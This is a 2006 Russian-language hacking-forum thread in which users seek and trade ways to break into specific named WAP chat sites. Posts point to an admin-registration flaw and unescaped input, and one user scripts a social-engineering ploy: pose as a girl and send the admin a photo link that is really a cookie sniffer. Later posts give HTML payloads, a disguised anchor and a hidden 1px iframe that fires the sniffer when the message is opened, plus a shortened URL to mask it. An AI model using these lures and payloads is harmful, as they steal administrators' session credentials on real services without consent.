Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
07.12.2006, 12:55
|
|
Новичок
Регистрация: 04.12.2006
Сообщений: 1
Провел на форуме:
6842
Репутация:
0
|
|
Мобильный чат Asylex!
Всем привет,сейчас по вапу распространяются новые чаты чем то похожие на бодр чат,только со множеством новинок! вот этот чат http://chat.asylex.com
Кто какие знает уязвимости этого чата,пишите сюда! Все уязвимости от бодра чата,описанные в этом форуме на Асилекс чате не пашут!
на http://chat.asylex.com дырочек думаю не будет,так как это автор скрипта,а вот тут http://anarim.gsm.az вполне могут быть!
Последний раз редактировалось Alexaz; 07.12.2006 в 12:58..
|
|
|
11.12.2006, 16:02
|
|
Познающий
Регистрация: 17.11.2006
Сообщений: 36
Провел на форуме:
40112
Репутация:
10
|
|
Сообщение от Alexaz
Всем привет,сейчас по вапу распространяются новые чаты чем то похожие на бодр чат,только со множеством новинок! вот этот чат http://chat.asylex.com
Кто какие знает уязвимости этого чата,пишите сюда! Все уязвимости от бодра чата,описанные в этом форуме на Асилекс чате не пашут!
на http://chat.asylex.com дырочек думаю не будет,так как это автор скрипта,а вот тут http://anarim.gsm.az вполне могут быть!
Советую посмотреть регистрацию! там дыра! большая! регистрируешься администратором! мне друган показывал но к сожелению я не запомнил стимволы которые он вводил!может скоро узнаю!
|
|
|
|
14.12.2006, 06:18
|
|
Новичок
Регистрация: 11.12.2006
Сообщений: 1
Провел на форуме:
3712
Репутация:
0
|
|
На anarim.gsm.az фильтруются переменные id,ps,nk,us,mod,ref,символы ',%27,* в гет и пост запросах
не фильтруется обратный слэш,в отправке почты и поиске можно выйти за кавычку,кому интересно мож покалупает  |
|
|
|
16.12.2006, 01:29
|
|
Познающий
Регистрация: 17.11.2006
Сообщений: 36
Провел на форуме:
40112
Репутация:
10
|
|
Сообщение от Alexaz
Всем привет,сейчас по вапу распространяются новые чаты чем то похожие на бодр чат,только со множеством новинок! вот этот чат http://chat.asylex.com
Кто какие знает уязвимости этого чата,пишите сюда! Все уязвимости от бодра чата,описанные в этом форуме на Асилекс чате не пашут!
на http://chat.asylex.com дырочек думаю не будет,так как это автор скрипта,а вот тут http://anarim.gsm.az вполне могут быть!
дыра в vhod.php chat.php mpanel.php ищи там не видно их все!
|
|
|
|
16.12.2006, 06:08
|
|
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950
Репутация:
175
|
|
К сожалению не смог зайти на http://chat.asylex.com
Но могу сказать с уверенностью!
В большинстве W@P-сайтов
Переменные [id=&pass=&] передаються методом GET
Так чтоб не париться Можно взять Ачатовский
сниффер, Зарегиться в чате под ником МАША и
написать Товарищу Админу HeLP-Письмецо :
Со следующим содержанием;;
Мне сказали что только вы мне сможете помочь!
У меня никак не получаеться вставить свою фотку
в анкету посмотрите что можно сделать!!!
Адрес фото: http://antichat.ru/sniffer.gif
Думаю шанс наивного админа ткнуть на ссылку(если он не посещал А-чат) примерно 80/20!!!
Далее, смотрим логи снифера!
И Да здравствует МИР во всём мире!
|
|
|
|
16.12.2006, 15:56
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
гы)) Чоб админ на такую сцылочку повелся, надо чтобы он был не просто наивным, а супер-супер ньюб.
Надо, по крайней мере писать свой простой пхп снифер, и назвать его как то менее вызывающе.
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 16.12.2006 в 16:39..
Причина: Раскритиковал, ничего не предложив.
|
|
|
|
16.12.2006, 22:28
|
|
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950
Репутация:
175
|
|
Сообщение от Constantine
гы)) Чоб админ на такую сцылочку повелся, надо чтобы он был не просто наивным, а супер-супер ньюб.
Надо, по крайней мере писать свой простой пхп снифер, и назвать его как то менее вызывающе.
Да ты прав ! Ссылка вызывает подозрения! Но в некоторых чатах Имееться возможность отправки личных сообщений!
Дак вот что я заметил, товарищи Админы не уделяют внимания на то что в писльмо можно вставить свой html-код!
Отсюда следует что достаточно написать такое сообщение чтобы все сомнения отвалились сами по себе!
<a href="http://antichat.ru/sniffer.gif">http://mashka.boom.ru/moe_foto.jpg</a>
А ещё лучше и надёжнее такая конструкция:
<!---В этом случае Админу нужно просто получить письмо и открыть его---!>
<iframe style="width=1;height=1" src="http://antichat.ru/sniffffer.gif"></iframe>
|
|
|
|
19.12.2006, 16:24
|
|
Новичок
Регистрация: 01.08.2006
Сообщений: 2
Провел на форуме:
6352
Репутация:
0
|
|
а для чего тогда tinyurl.ru?
вот antichat.ru/sniffer.gif в виде http://tinyurl.ru/l0
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
